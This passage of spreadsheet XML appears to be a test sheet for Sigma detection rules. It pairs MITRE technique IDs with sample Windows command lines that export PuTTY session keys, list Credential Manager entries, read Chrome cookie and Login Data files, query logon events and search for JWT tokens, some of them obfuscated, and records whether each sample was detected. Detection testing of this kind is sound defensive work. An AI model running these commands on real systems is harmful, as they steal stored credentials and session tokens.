          <t>Registry Export of Third-Party Credentials (cc1abf27-78a3-4ac5-a51c-f3070b1d8e40); Enumeration for 3rd Party Creds From CLI (87a476dc-0079-4583-a985-dee7a20a03de)</t>
        </is>
      </c>
      <c r="J1936" s="44" t="n"/>
      <c r="K1936" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1937" ht="15.75" customHeight="1" s="42">
      <c r="A1937" s="44" t="inlineStr">
        <is>
          <t>t1552.002</t>
        </is>
      </c>
      <c r="B1937" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_export_of_thirdparty_creds</t>
        </is>
      </c>
      <c r="C1937" s="44" t="inlineStr">
        <is>
          <t>Registry Export of Third-Party Credentials</t>
        </is>
      </c>
      <c r="D1937" s="44" t="inlineStr">
        <is>
          <t>cc1abf27-78a3-4ac5-a51c-f3070b1d8e40</t>
        </is>
      </c>
      <c r="E1937" s="44" t="inlineStr">
        <is>
          <t>reg.exe export "HKCU\Software\SimonTatham\PuTTY\Sessions" C:\Windows\Temp\test.reg</t>
        </is>
      </c>
      <c r="F1937" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1937" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1937" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1937" s="44" t="inlineStr">
        <is>
          <t>Registry Export of Third-Party Credentials (cc1abf27-78a3-4ac5-a51c-f3070b1d8e40); Enumeration for 3rd Party Creds From CLI (87a476dc-0079-4583-a985-dee7a20a03de)</t>
        </is>
      </c>
      <c r="J1937" s="44" t="n"/>
      <c r="K1937" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1938" ht="15.75" customHeight="1" s="42">
      <c r="A1938" s="44" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B1938" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_keymgr</t>
        </is>
      </c>
      <c r="C1938" s="44" t="inlineStr">
        <is>
          <t>Suspicious Key Manager Access</t>
        </is>
      </c>
      <c r="D1938" s="44" t="inlineStr">
        <is>
          <t>a4694263-59a8-4608-a3a0-6f8d3a51664c</t>
        </is>
      </c>
      <c r="E1938" s="44" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\system32\rundll32.exe" "keymgr","KRShowKeyMgr"</t>
        </is>
      </c>
      <c r="F1938" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1938" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1938" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1938" s="44" t="n"/>
      <c r="J1938" s="44" t="n"/>
      <c r="K1938" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1939" ht="15.75" customHeight="1" s="42">
      <c r="A1939" s="44" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B1939" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_keymgr</t>
        </is>
      </c>
      <c r="C1939" s="44" t="inlineStr">
        <is>
          <t>Suspicious Key Manager Access</t>
        </is>
      </c>
      <c r="D1939" s="44" t="inlineStr">
        <is>
          <t>a4694263-59a8-4608-a3a0-6f8d3a51664c</t>
        </is>
      </c>
      <c r="E1939" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\WINDOWS\system32\rundll32.exe" k^eymgr,K^RShowKeyMgr</t>
        </is>
      </c>
      <c r="F1939" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1939" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1939" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1939" s="44" t="inlineStr">
        <is>
          <t>Suspicious Key Manager Access (a4694263-59a8-4608-a3a0-6f8d3a51664c); Rundll32 Execution With Uncommon DLL Extension (c3a99af4-35a9-4668-879e-c09aeb4f2bdf)</t>
        </is>
      </c>
      <c r="J1939" s="44" t="n"/>
      <c r="K1939" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1940" ht="15.75" customHeight="1" s="42">
      <c r="A1940" s="44" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B1940" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_keymgr</t>
        </is>
      </c>
      <c r="C1940" s="44" t="inlineStr">
        <is>
          <t>Suspicious Key Manager Access</t>
        </is>
      </c>
      <c r="D1940" s="44" t="inlineStr">
        <is>
          <t>a4694263-59a8-4608-a3a0-6f8d3a51664c</t>
        </is>
      </c>
      <c r="E1940" s="44" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\system32\rundll32.exe" keymgr.dll,KRShowKeyMgr</t>
        </is>
      </c>
      <c r="F1940" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1940" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1940" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1940" s="44" t="n"/>
      <c r="J1940" s="44" t="n"/>
      <c r="K1940" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1941" ht="15.75" customHeight="1" s="42">
      <c r="A1941" s="44" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B1941" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vaultcmd_list_creds</t>
        </is>
      </c>
      <c r="C1941" s="44" t="inlineStr">
        <is>
          <t>Windows Credential Manager Access via VaultCmd</t>
        </is>
      </c>
      <c r="D1941" s="44" t="inlineStr">
        <is>
          <t>58f50261-c53b-4c88-bd12-1d71f12eda4c</t>
        </is>
      </c>
      <c r="E1941" s="44" t="inlineStr">
        <is>
          <t>vaultcmd /listcreds:"Windows Credentials"</t>
        </is>
      </c>
      <c r="F1941" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1941" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1941" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1941" s="44" t="inlineStr">
        <is>
          <t>Windows Credential Manager Access via VaultCmd (58f50261-c53b-4c88-bd12-1d71f12eda4c)</t>
        </is>
      </c>
      <c r="J1941" s="44" t="n"/>
      <c r="K1941" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1942" ht="15.75" customHeight="1" s="42">
      <c r="A1942" s="44" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B1942" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vaultcmd_list_creds</t>
        </is>
      </c>
      <c r="C1942" s="44" t="inlineStr">
        <is>
          <t>Windows Credential Manager Access via VaultCmd</t>
        </is>
      </c>
      <c r="D1942" s="44" t="inlineStr">
        <is>
          <t>58f50261-c53b-4c88-bd12-1d71f12eda4c</t>
        </is>
      </c>
      <c r="E1942" s="44" t="inlineStr">
        <is>
          <t>vaultcmd.exe "/listcreds:Windows Credentials"</t>
        </is>
      </c>
      <c r="F1942" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1942" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1942" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1942" s="44" t="inlineStr">
        <is>
          <t>Windows Credential Manager Access via VaultCmd (58f50261-c53b-4c88-bd12-1d71f12eda4c)</t>
        </is>
      </c>
      <c r="J1942" s="44" t="n"/>
      <c r="K1942" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1943" ht="15.75" customHeight="1" s="42">
      <c r="A1943" s="44" t="inlineStr">
        <is>
          <t>t1555.004</t>
        </is>
      </c>
      <c r="B1943" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_vaultcmd_list_creds</t>
        </is>
      </c>
      <c r="C1943" s="44" t="inlineStr">
        <is>
          <t>Windows Credential Manager Access via VaultCmd</t>
        </is>
      </c>
      <c r="D1943" s="44" t="inlineStr">
        <is>
          <t>58f50261-c53b-4c88-bd12-1d71f12eda4c</t>
        </is>
      </c>
      <c r="E1943" s="44" t="inlineStr">
        <is>
          <t>vaultcmd.exe /listcreds:"Windows Credentials" /all</t>
        </is>
      </c>
      <c r="F1943" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1943" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1943" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1943" s="44" t="inlineStr">
        <is>
          <t>Windows Credential Manager Access via VaultCmd (58f50261-c53b-4c88-bd12-1d71f12eda4c)</t>
        </is>
      </c>
      <c r="J1943" s="44" t="n"/>
      <c r="K1943" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1944" ht="15.75" customHeight="1" s="42">
      <c r="A1944" s="44" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B1944" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_chromium_profile_data</t>
        </is>
      </c>
      <c r="C1944" s="44" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access</t>
        </is>
      </c>
      <c r="D1944" s="44" t="inlineStr">
        <is>
          <t>24c77512-782b-448a-8950-eddb0785fc71</t>
        </is>
      </c>
      <c r="E1944" s="44" t="inlineStr">
        <is>
          <t>C:\AtomicRedTeam\atomics\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe "C:\Users\thaim\AppData\Local\Google\Chrome\User Data\Default\Network\"Cookies</t>
        </is>
      </c>
      <c r="F1944" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1944" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1944" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1944" s="44" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access (24c77512-782b-448a-8950-eddb0785fc71)</t>
        </is>
      </c>
      <c r="J1944" s="44" t="n"/>
      <c r="K1944" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1945" ht="15.75" customHeight="1" s="42">
      <c r="A1945" s="44" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B1945" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_chromium_profile_data</t>
        </is>
      </c>
      <c r="C1945" s="44" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access</t>
        </is>
      </c>
      <c r="D1945" s="44" t="inlineStr">
        <is>
          <t>24c77512-782b-448a-8950-eddb0785fc71</t>
        </is>
      </c>
      <c r="E1945" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\AtomicRedTeam\atomics\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe "C:\Users\thaim\AppData\Local\Google\Chrome\USERDA~1\Default\Network\Cookies"</t>
        </is>
      </c>
      <c r="F1945" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1945" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1945" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1945" s="44" t="inlineStr">
        <is>
          <t>Use Short Name Path in Command Line (349d891d-fef0-4fe4-bc53-eee623a15969); Use Short Name Path in Command Line (349d891d-fef0-4fe4-bc53-eee623a15969)</t>
        </is>
      </c>
      <c r="J1945" s="44" t="n"/>
      <c r="K1945" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1946" ht="15.75" customHeight="1" s="42">
      <c r="A1946" s="44" t="inlineStr">
        <is>
          <t>t1539</t>
        </is>
      </c>
      <c r="B1946" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sqlite_chromium_profile_data</t>
        </is>
      </c>
      <c r="C1946" s="44" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access</t>
        </is>
      </c>
      <c r="D1946" s="44" t="inlineStr">
        <is>
          <t>24c77512-782b-448a-8950-eddb0785fc71</t>
        </is>
      </c>
      <c r="E1946" s="44" t="inlineStr">
        <is>
          <t>C:\AtomicRedTeam\atomics\..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe "C:\Users\thaim\AppData\Local\Google\Chrome\User Data"\Default\Network\Cookies</t>
        </is>
      </c>
      <c r="F1946" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1946" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1946" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1946" s="44" t="inlineStr">
        <is>
          <t>SQLite Chromium Profile Data DB Access (24c77512-782b-448a-8950-eddb0785fc71)</t>
        </is>
      </c>
      <c r="J1946" s="44" t="n"/>
      <c r="K1946" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1947" ht="15.75" customHeight="1" s="42">
      <c r="A1947" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B1947" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_browser_data</t>
        </is>
      </c>
      <c r="C1947" s="44" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing</t>
        </is>
      </c>
      <c r="D1947" s="44" t="inlineStr">
        <is>
          <t>47147b5b-9e17-4d76-b8d2-7bac24c5ce1b</t>
        </is>
      </c>
      <c r="E1947" s="44" t="inlineStr">
        <is>
          <t>powershell.exe &amp; {Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" | Copy-Item -Destination "C:\Temp"}</t>
        </is>
      </c>
      <c r="F1947" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1947" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1947" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1947" s="44" t="n"/>
      <c r="J1947" s="44" t="n"/>
      <c r="K1947" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1948" ht="15.75" customHeight="1" s="42">
      <c r="A1948" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B1948" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_browser_data</t>
        </is>
      </c>
      <c r="C1948" s="44" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing</t>
        </is>
      </c>
      <c r="D1948" s="44" t="inlineStr">
        <is>
          <t>47147b5b-9e17-4d76-b8d2-7bac24c5ce1b</t>
        </is>
      </c>
      <c r="E1948" s="44" t="inlineStr">
        <is>
          <t>powershell.exe &amp; {Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data""\Default\Login Data" -Destination "C:\Temp"}</t>
        </is>
      </c>
      <c r="F1948" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1948" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1948" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1948" s="44" t="n"/>
      <c r="J1948" s="44" t="n"/>
      <c r="K1948" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1949" ht="15.75" customHeight="1" s="42">
      <c r="A1949" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B1949" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_browser_data</t>
        </is>
      </c>
      <c r="C1949" s="44" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing</t>
        </is>
      </c>
      <c r="D1949" s="44" t="inlineStr">
        <is>
          <t>47147b5b-9e17-4d76-b8d2-7bac24c5ce1b</t>
        </is>
      </c>
      <c r="E1949" s="44" t="inlineStr">
        <is>
          <t>powershell.exe &amp; {Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User` Data\Default\Login Data" -Destination "C:\Temp"}</t>
        </is>
      </c>
      <c r="F1949" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1949" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1949" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1949" s="44" t="n"/>
      <c r="J1949" s="44" t="n"/>
      <c r="K1949" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1950" ht="15.75" customHeight="1" s="42">
      <c r="A1950" s="44" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B1950" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_browser_data</t>
        </is>
      </c>
      <c r="C1950" s="44" t="inlineStr">
        <is>
          <t>Potential Browser Data Stealing</t>
        </is>
      </c>
      <c r="D1950" s="44" t="inlineStr">
        <is>
          <t>47147b5b-9e17-4d76-b8d2-7bac24c5ce1b</t>
        </is>
      </c>
      <c r="E1950" s="44" t="inlineStr">
        <is>
          <t>powershell.exe &amp; {Copy-Item "$env:LOCALAPPDATA/Google/Chrome/User Data/Default/Login Data" -Destination "C:\Temp"}</t>
        </is>
      </c>
      <c r="F1950" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G1950" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1950" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1950" s="44" t="n"/>
      <c r="J1950" s="44" t="n"/>
      <c r="K1950" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1951" ht="15.75" customHeight="1" s="42">
      <c r="A1951" s="44" t="inlineStr">
        <is>
          <t>t1552</t>
        </is>
      </c>
      <c r="B1951" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_eventlog_content_recon</t>
        </is>
      </c>
      <c r="C1951" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities</t>
        </is>
      </c>
      <c r="D1951" s="44" t="inlineStr">
        <is>
          <t>beaa66d6-aa1b-4e3c-80f5-e0145369bfaf</t>
        </is>
      </c>
      <c r="E1951" s="44" t="inlineStr">
        <is>
          <t>wevtutil.exe qe "Security" "/q:*[System[(EventID=4624)]]"</t>
        </is>
      </c>
      <c r="F1951" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1951" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1951" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1951" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities (beaa66d6-aa1b-4e3c-80f5-e0145369bfaf)</t>
        </is>
      </c>
      <c r="J1951" s="44" t="n"/>
      <c r="K1951" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1952" ht="15.75" customHeight="1" s="42">
      <c r="A1952" s="44" t="inlineStr">
        <is>
          <t>t1552</t>
        </is>
      </c>
      <c r="B1952" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_eventlog_content_recon</t>
        </is>
      </c>
      <c r="C1952" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities</t>
        </is>
      </c>
      <c r="D1952" s="44" t="inlineStr">
        <is>
          <t>beaa66d6-aa1b-4e3c-80f5-e0145369bfaf</t>
        </is>
      </c>
      <c r="E1952" s="44" t="inlineStr">
        <is>
          <t>wevtutil.exe qe Security /q:"*[System/EventID=4624]"</t>
        </is>
      </c>
      <c r="F1952" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1952" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1952" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1952" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities (beaa66d6-aa1b-4e3c-80f5-e0145369bfaf)</t>
        </is>
      </c>
      <c r="J1952" s="44" t="n"/>
      <c r="K1952" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1953" ht="15.75" customHeight="1" s="42">
      <c r="A1953" s="44" t="inlineStr">
        <is>
          <t>t1528</t>
        </is>
      </c>
      <c r="B1953" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_jwt_token_search</t>
        </is>
      </c>
      <c r="C1953" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious JWT Token Search Via CLI</t>
        </is>
      </c>
      <c r="D1953" s="44" t="inlineStr">
        <is>
          <t>6d3a3952-6530-44a3-8554-cf17c116c615</t>
        </is>
      </c>
      <c r="E1953" s="44" t="inlineStr">
        <is>
          <t>findstr.exe /s /i "eyJ0e^XAiOi" C:\Users\Public\*.txt</t>
        </is>
      </c>
      <c r="F1953" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1953" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1953" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1953" s="44" t="inlineStr">
        <is>
          <t>Insensitive Subfolder Search Via Findstr.EXE (04936b66-3915-43ad-a8e5-809eadfd1141); Insensitive Subfolder Search Via Findstr.EXE (04936b66-3915-43ad-a8e5-809eadfd1141)</t>
        </is>
      </c>
      <c r="J1953" s="44" t="n"/>
      <c r="K1953" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1954" ht="15.75" customHeight="1" s="42">
      <c r="A1954" s="44" t="inlineStr">
        <is>
          <t>t1528</t>
        </is>
      </c>
      <c r="B1954" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_jwt_token_search</t>
        </is>
      </c>
      <c r="C1954" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious JWT Token Search Via CLI</t>
        </is>
      </c>
      <c r="D1954" s="44" t="inlineStr">
        <is>
          <t>6d3a3952-6530-44a3-8554-cf17c116c615</t>
        </is>
      </c>
      <c r="E1954" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "set SEARCH_VAL=eyJ0eXAiOi&amp;&amp; call findstr.exe %SEARCH_VAL% C:\Users\Public\*.txt"</t>
        </is>
      </c>
      <c r="F1954" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1954" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H1954" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1954" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious JWT Token Search Via CLI (6d3a3952-6530-44a3-8554-cf17c116c615); Potentially Suspicious JWT Token Search Via CLI (6d3a3952-6530-44a3-8554-cf17c116c615)</t>
        </is>
      </c>
      <c r="J1954" s="44" t="n"/>
      <c r="K1954" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1955" ht="15.75" customHeight="1" s="42"/>
    <row r="1956" ht="15.75" customHeight="1" s="42"/>
    <row r="1957" ht="15.75" customHeight="1" s="42"/>
    <row r="1958" ht="15.75" customHeight="1" s="42"/>
    <row r="1959" ht="15.75" customHeight="1" s="42"/>
    <row r="1960" ht="15.75" customHeight="1" s="42"/>
    <row r="1961" ht="15.75" customHeight="1" s="42"/>
    <row r="1962" ht="15.75" customHeight="1" s="42"/>
    <row r="1963" ht="15.75" customHeight="1" s="42"/>
    <row r="1964" ht="15.75" customHeight="1" s="42"/>
    <row r="1965" ht="15.75" customHeight="1" s="42"/>
    <row r="1966" ht="15.75" customHeight="1" s="42"/>
    <row r="1967" ht="15.75" customHeight="1" s="42"/>
    <row r="1968" ht="15.75" customHeight="1" s="42"/>
    <row r="1969" ht="15.75" customHeight="1" s="42"/>
    <row r="1970" ht="15.75" customHeight="1" s="42"/>
    <row r="1971" ht="15.75" customHeight="1" s="42"/>
    <row r="1972" ht="15.75" customHeight="1" s="42"/>
    <row r="1973" ht="15.75" customHeight="1" s="42"/>
    <row r="1974" ht="15.75" customHeight="1" s="42"/>
    <row r="1975" ht="15.75" customHeight="1" s="42"/>
    <row r="1976" ht="15.75" customHeight="1" s="42"/>
    <row r="1977" ht="15.75" customHeight="1" s="42"/>
    <row r="1978" ht="15.75" customHeight="1" s="42"/>
    <row r="1979" ht="15.75" customHeight="1" s="42"/>
    <row r="1980" ht="15.75" customHeight="1" s="42"/>
    <row r="1981" ht="15.75" customHeight="1" s="42"/>
    <row r="1982" ht="15.75" customHeight="1" s="42"/>
    <row r="1983" ht="15.75" customHeight="1" s="42"/>
    <row r="1984" ht="15.75" customHeight="1" s="42"/>
    <row r="1985" ht="15.75" customHeight="1" s="42"/>
    <row r="1986" ht="15.75" customHeight="1" s="42"/>
    <row r="1987" ht="15.75" customHeight="1" s="42"/>
    <row r="1988" ht="15.75" customHeight="1" s="42"/>
    <row r="1989" ht="15.75" customHeight="1" s="42"/>
    <row r="1990" ht="15.75" customHeight="1" s="42"/>
    <row r="1991" ht="15.75" customHeight="1" s="42"/>
    <row r="1992" ht="15.75" customHeight="1" s="42"/>
    <row r="1993" ht="15.75" customHeight="1" s="42"/>
    <row r="1994" ht="15.75" customHeight="1" s="42"/>
    <row r="1995" ht="15.75" customHeight="1" s="42"/>
    <row r="1996" ht="15.75" customHeight="1" s="42"/>
    <row r="1997" ht="15.75" customHeight="1" s="42"/>
    <row r="1998" ht="15.75" customHeight="1" s="42"/>
    <row r="1999" ht="15.75" customHeight="1" s="42"/>
    <row r="2000" ht="15.75" customHeight="1" s="42"/>
    <row r="2001" ht="15.75" customHeight="1" s="42"/>
    <row r="2002" ht="15.75" customHeight="1" s="42"/>
    <row r="2003" ht="15.75" customHeight="1" s="42"/>
    <row r="2004" ht="15.75" customHeight="1" s="42"/>
    <row r="2005" ht="15.75" customHeight="1" s="42"/>
    <row r="2006" ht="15.75" customHeight="1" s="42"/>
    <row r="2007" ht="15.75" customHeight="1" s="42"/>
    <row r="2008" ht="15.75" customHeight="1" s="42"/>
    <row r="2009" ht="15.75" customHeight="1" s="42"/>
    <row r="2010" ht="15.75" customHeight="1" s="42"/>
    <row r="2011" ht="15.75" customHeight="1" s="42"/>
    <row r="2012" ht="15.75" customHeight="1" s="42"/>
    <row r="2013" ht="15.75" customHeight="1" s="42"/>
    <row r="2014" ht="15.75" customHeight="1" s="42"/>
    <row r="2015" ht="15.75" customHeight="1" s="42"/>
    <row r="2016" ht="15.75" customHeight="1" s="42"/>
    <row r="2017" ht="15.75" customHeight="1" s="42"/>
    <row r="2018" ht="15.75" customHeight="1" s="42"/>
    <row r="2019" ht="15.75" customHeight="1" s="42"/>
    <row r="2020" ht="15.75" customHeight="1" s="42"/>
    <row r="2021" ht="15.75" customHeight="1" s="42"/>
    <row r="2022" ht="15.75" customHeight="1" s="42"/>
    <row r="2023" ht="15.75" customHeight="1" s="42"/>
    <row r="2024" ht="15.75" customHeight="1" s="42"/>
    <row r="2025" ht="15.75" customHeight="1" s="42"/>
    <row r="2026" ht="15.75" customHeight="1" s="42"/>
    <row r="2027" ht="15.75" customHeight="1" s="42"/>
    <row r="2028" ht="15.75" customHeight="1" s="42"/>
    <row r="2029" ht="15.75" customHeight="1" s="42"/>
    <row r="2030" ht="15.75" customHeight="1" s="42"/>
    <row r="2031" ht="15.75" customHeight="1" s="42"/>
    <row r="2032" ht="15.75" customHeight="1" s="42"/>
    <row r="2033" ht="15.75" customHeight="1" s="42"/>
    <row r="2034" ht="15.75" customHeight="1" s="42"/>
    <row r="2035" ht="15.75" customHeight="1" s="42"/>
    <row r="2036" ht="15.75" customHeight="1" s="42"/>
    <row r="2037" ht="15.75" customHeight="1" s="42"/>
    <row r="2038" ht="15.75" customHeight="1" s="42"/>
    <row r="2039" ht="15.75" customHeight="1" s="42"/>
    <row r="2040" ht="15.75" customHeight="1" s="42"/>
    <row r="2041" ht="15.75" customHeight="1" s="42"/>
    <row r="2042" ht="15.75" customHeight="1" s="42"/>
    <row r="2043" ht="15.75" customHeight="1" s="42"/>
    <row r="2044" ht="15.75" customHeight="1" s="42"/>
    <row r="2045" ht="15.75" customHeight="1" s="42"/>
    <row r="2046" ht="15.75" customHeight="1" s="42"/>
    <row r="2047" ht="15.75" customHeight="1" s="42"/>
    <row r="2048" ht="15.75" customHeight="1" s="42"/>
    <row r="2049" ht="15.75" customHeight="1" s="42"/>
    <row r="2050" ht="15.75" customHeight="1" s="42"/>
    <row r="2051" ht="15.75" customHeight="1" s="42"/>
    <row r="2052" ht="15.75" customHeight="1" s="42"/>
    <row r="2053" ht="15.75" customHeight="1" s="42"/>
    <row r="2054" ht="15.75" customHeight="1" s="42"/>
    <row r="2055" ht="15.75" customHeight="1" s="42"/>
    <row r="2056" ht="15.75" customHeight="1" s="42"/>
    <row r="2057" ht="15.75" customHeight="1" s="42"/>
    <row r="2058" ht="15.75" customHeight="1" s="42"/>
    <row r="2059" ht="15.75" customHeight="1" s="42"/>
    <row r="2060" ht="15.75" customHeight="1" s="42"/>
    <row r="2061" ht="15.75" customHeight="1" s="42"/>
    <row r="2062" ht="15.75" customHeight="1" s="42"/>
    <row r="2063" ht="15.75" customHeight="1" s="42"/>
    <row r="2064" ht="15.75" customHeight="1" s="42"/>
    <row r="2065" ht="15.75" customHeight="1" s="42"/>
    <row r="2066" ht="15.75" customHeight="1" s="42"/>
    <row r="2067" ht="15.75" customHeight="1" s="42"/>
    <row r="2068" ht="15.75" customHeight="1" s="42"/>
    <row r="2069" ht="15.75" customHeight="1" s="42"/>
    <row r="2070" ht="15.75" customHeight="1" s="42"/>
    <row r="2071" ht="15.75" customHeight="1" s="42"/>
    <row r="2072" ht="15.75" customHeight="1" s="42"/>
    <row r="2073" ht="15.75" customHeight="1" s="42"/>
    <row r="2074" ht="15.75" customHeight="1" s="42"/>
    <row r="2075" ht="15.75" customHeight="1" s="42"/>
    <row r="2076" ht="15.75" customHeight="1" s="42"/>
    <row r="2077" ht="15.75" customHeight="1" s="42"/>
    <row r="2078" ht="15.75" customHeight="1" s="42"/>
    <row r="2079" ht="15.75" customHeight="1" s="42"/>
    <row r="2080" ht="15.75" customHeight="1" s="42"/>
    <row r="2081" ht="15.75" customHeight="1" s="42"/>
    <row r="2082" ht="15.75" customHeight="1" s="42"/>
    <row r="2083" ht="15.75" customHeight="1" s="42"/>
    <row r="2084" ht="15.75" customHeight="1" s="42"/>
    <row r="2085" ht="15.75" customHeight="1" s="42"/>
    <row r="2086" ht="15.75" customHeight="1" s="42"/>
    <row r="2087" ht="15.75" customHeight="1" s="42"/>
    <row r="2088" ht="15.75" customHeight="1" s="42"/>
    <row r="2089" ht="15.75" customHeight="1" s="42"/>
